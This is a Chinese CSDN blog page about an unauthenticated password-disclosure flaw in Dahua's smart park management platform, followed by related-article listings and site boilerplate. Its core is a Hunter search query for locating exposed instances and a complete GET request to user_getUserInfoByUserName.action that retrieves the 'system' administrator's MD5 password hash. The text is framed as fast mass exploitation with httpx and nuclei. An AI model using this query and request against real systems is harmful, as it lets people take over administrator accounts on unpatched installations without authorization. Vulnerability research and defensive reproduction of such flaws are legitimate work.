httpx+nuclei实战 | 大华智慧园区综合管理平台任意密码读取漏洞

最新推荐文章于 2024-04-14 09:29:58 发布
最新推荐文章于 2024-04-14 09:29:58 发布
阅读量424 收藏 3
点赞数
分类专栏: 技术干货 文章标签: 1024程序员节 web安全 php 服务器 安全 网络 httpx
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackzkaq/article/details/134015179
版权
本文介绍了大华智慧园区综合管理平台存在的一个安全漏洞,由于权限管理不当,允许通过user_getUserInfoByUserName.action获取MD5加密后的system用户密码。通过编写YAML文件和使用httpx、nuclei工具,可以实现漏洞的快速探测和利用。文中还分享了httpx和nuclei的下载及使用方法,强调了验证漏洞真实性的重要性。
摘要由CSDN通过智能技术生成

目录

漏洞成因

hunter语法

POC

速刷技巧

httpx和nuclei的下载链接

使用方法

                hack渗透视频 网安资料欢迎领取

漏洞成因

没有对接口进行严格的权限管理,导致可以通过访问user_getUserInfoByUserName.action获取system用户的MD5加密后的密码

hunter语法

web.icon="4644f2d45601037b8423d45e13194c93"&&web.title="智慧园区综合管理平台"

POC​​​​​​​
GET /admin/user_getUserInfoByUserName.action?userName=system HTTP/1.1Host: xxxxxxxxxCookie: JSESSIONID=D99F6DAEA7EC0695266E95A1B1A529CCCache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate
最低0.47元/天 解锁文章
zkzq
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
大华智慧园区管理平台任意密码读取漏洞 复现
薛定谔嘚喵博客
10-08 322
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务、摄像监控等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。 大华智慧园区综合管理平台存在任意密码读取漏洞,可以直接读取管理账号名以及其密码Hash值,造成未授权登入访问劫持园区管理平台,危害性高。
漏洞复现】大华智慧园区综合管理平台任意密码读取漏洞
失心少年
08-29 969
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!
大华智慧园区综合管理平文件上传(附nuclei POC)、密码泄露漏洞
m0_46317063的博客
08-31 420
【代码】大华智慧园区综合管理平文件上传漏洞(附nuclei POC)
大华智慧园区综合管理平台任意密码读取漏洞复现
08-14 2330
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
编写Yaml文件当Poc,利用Nuclei扫描器去扫描漏洞
XXokok的博客
12-09 1934
编写Yaml文件当Poc,利用Nuclei扫描器去扫描漏洞。使用工具一键生成Yaml文件
POC检测工具-nuclei(四)
siu~
07-28 5300
nuclei是一款基于简单的 YAML DSL 的快速且可定制的漏洞扫描器。
Nuclei联动工具
weixin_43993545的博客
05-17 376
我们进行测试漏洞的时候,可以利用FoFax联动Nuclei方式来很方便的实现此目的。提高效率,提高生产力
打造全自动漏洞赏金扫描工具
渗透测试研究中心
08-25 2756
打造全自动漏洞赏金扫描工具
打造全自动漏洞赏金扫描工具_nuclei扫描器联动xray
yy1715713348的博客
01-25 1363
建议在 Digital Ocean 或 vultr 等 VPS 系统上运行这些程序,启一个后台线程即可,建议使用tmux的后台功能这样扫描到重复漏洞会非常少的,也会更加容易获取赏金,将更多的关注新资产漏洞资产侦察 资产收集、端口扫描,去重检测,存活探测,漏洞扫描,全自动化,结果通知,全部自动化了,即使睡觉也在挖洞随着信息技术的快速发展和互联网的普及,IT行业 成为一个非常热门的领域,也是目前就业前景非常广阔的领域之一。
漏洞复现】大华智慧园区综合管理平台任意密码读取
2201_75756681的博客
01-05 653
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
httpx+async实现python 发起异步http请求
07-10
在模拟测试并发的场景下,例如性能测试或负载测试,`httpx+async`的组合非常有用。你可以创建大量的异步任务来模拟多用户同时访问服务器,评估系统的处理能力、响应时间和吞吐量。通过调整并发任务的数量,可以更...
subdomain_shell:一键调用subfinder+ksubdomain+httpx 强强联合 从域名发现-->域名验证-->获取域名标题、状态码以及响应大小 最后保存结果,简化重复操作命令
05-05
一键调用subfinder+ksubdomain+httpx 强强联合 从域名发现-->域名验证-->获取域名标题、状态码以及响应大小 最后保存结果,简化重复操作命令 updated on 2021-03-18 22:45 因为懒 \-_-\ 不想重复写命令,故诞生...
PyPI 官网下载 | httpx-0.7.6.tar.gz
01-12
5. **超时控制**:httpx允许精细控制请求超时,包括连接超时和读取超时。 6. **HTTP/1.1 和 HTTP/2 支持**:httpx自动处理HTTP协议版本,可以与服务器协商最合适的协议版本。 7. **自动重试**:对于网络不稳定的情况...
Python爬虫最强组合httpx+parsel测评
mid56579的博客
07-29 865
Python网络爬虫领域两个最新的比较火的工具莫过于httpx和parsel了。 httpx号称下一代的新一代的网络请求库,不仅支持requests库的所有操作,还能发送异步请求,为编写异步爬虫提供了便利。 parsel最初集成在著名Python爬虫框架Scrapy中,后独立出来成立一个单独的模块,支持XPath选择器, CSS选择器和正则表达式等多种解析提取方式, 据说相比于BeautifulSoup,parsel的解析效率更高。 今天我们就以爬取链家网上的二手房在售房产信息为例,来测评下httpx
Day101:漏洞发现-漏扫项目篇&Nuclei&Yakit&Goby&Afrog&Xray&Awvs&联动中转被动
最新发布
qq_61553520的博客
04-14 1281
小迪安全-Day101:漏洞发现-漏扫项目篇&Nuclei&Yakit&Goby&Afrog&Xray&Awvs&联动中转被动
OneThink前台注入-代码审计+nuclei、sqlmap与flask梦幻联动
qq_73648490的博客
02-26 978
代码审计+后端知识+渗透
使用nuclei扩充自己的武器库-nuclei3 sdk开发指南
whoami
03-15 840
Nuclei 使用模板来定义漏洞扫描任务。这些模板是基于 YAML 格式的,允许用户根据需要定制扫描规则和操作。Nuclei 官方社区包含一个内置的模板库,其中包含常见的漏洞检测规则,例如 XSS、SQL 注入、路径遍历等。Nuclei 是一个快速、灵活、可扩展的开源漏洞扫描工具,用于发现 Web 应用程序中的安全问题。它允许安全研究人员和渗透测试人员轻松地定义和执行定制的漏洞扫描任务。Nuclei3版本以上迎来了重大更新,官方开始支持nuclei作为sdk的形式,嵌入到开发者自己的工具当中。
httpx python
08-02
httpx是一个Python的HTTP客户端库,用于发送HTTP请求。它提供了简洁的API和许多高级功能,使得发送HTTP请求变得更加方便和灵活。[1]在使用httpx发送POST请求时,可以通过传递一个字典作为data参数来发送数据给服务端。例如,可以使用以下代码发送一个POST请求并打印响应的内容: ```python import httpx data = {"username": "zhugexu", "password": "123456"} r = httpx.post('http://httpbin.org/post', data=data) print(r.text) ``` [1] 而对于GET请求,可以通过params参数来传递查询参数,httpx会自动将其拼接在URL的尾部。例如,可以使用以下代码发送一个GET请求并打印请求的URL: ```python import httpx response = httpx.get("http://www.baidu.com/s", params={"wd": "python"}) print(response.url) ``` [2] 需要注意的是,有些网站会设置反爬虫机制,最常用的是判断请求头中的User-Agent字段。如果不是浏览器的User-Agent,网站可能会屏蔽你的请求。因此,在使用httpx发送请求时,可以通过设置headers参数来模拟浏览器的User-Agent。例如,可以使用以下代码打印httpx和requests发送请求时的User-Agent: ```python import httpx import requests response = httpx.get("http://www.baidu.com") print(response.request.headers["User-Agent"]) # python-httpx/0.23.3 response = requests.get("http://www.baidu.com") print(response.request.headers["User-Agent"]) # python-requests/2.28.0 ``` [3]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值